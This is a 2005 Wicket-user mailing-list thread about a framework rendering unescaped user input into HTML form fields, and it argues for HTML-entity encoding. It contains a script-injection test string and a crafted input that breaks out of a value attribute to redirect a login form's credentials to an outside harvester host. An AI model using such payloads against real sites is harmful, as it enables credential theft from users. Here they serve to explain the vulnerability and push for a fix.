Johan Compagner wrote:
so when i have this:
x = 6 < 7 & 10 > 5
as text in my model it gets encoded into html? (And thats what i see?)
That is something i don't want
No, I think this would be the right thing to do:
the value of the model is x = 6 < 7 & 10 > 5
but as soon as wicket renders the page and the value of the input field
that the model is attached to,
it should render the value as x = 6 < 7 & 10 > 5
so that the html source will read
<input type="text" value="x = 6 < 7 & 10 > 5">
instead of
<input type="text" value="x = 6 < 7 & 10 > 5">
special chars should only be RENDERED as html entities, not saved as
html entities in the model.
The problem you describe is i think the " at the beginning that makes
it all possible,
(else it was just a text value of the value attribute)
the " makes it possible to break out of the value parameter of the input
field. That could pose a security risk, though.
Imagine this: You have a login form that saves the username in case the
login failed and the page is reloaded.
Some malicious person opens the login page and enters this:
"
onChange=document.form[0].action='http://loginAndPasswordHarvester.com'
dummy="
He sends off the form, it gets reloaded because the "login" is invalid
and he leaves the terminal for someone else to login.
When someone else trys to log in, their username and password get sent
to a different server.
So I guess rendering special characters as html entities might be a good
idea.
Cheers,
Johannes.
johan
On 11/24/05, *Johannes Fahrenkrug* <[EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>> wrote:
Hi,
I have built several forms using Wicket. Just out of curiosity I
tried
to enter the following line into a text field:
"><script>alert('Soylent Green Is People');</script test="
When I reload the form, the JavaScript code gets executed. Shouldn't
such special characters be converted to HTML entities when the
page gets
parsed? (You know < instead of < and so forth)
Cheers,
Johannes.
-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through
log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD
SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
<http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click>
_______________________________________________
Wicket-user mailing list
[email protected]
<mailto:[email protected]>
https://lists.sourceforge.net/lists/listinfo/wicket-user
-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
_______________________________________________
Wicket-user mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/wicket-user
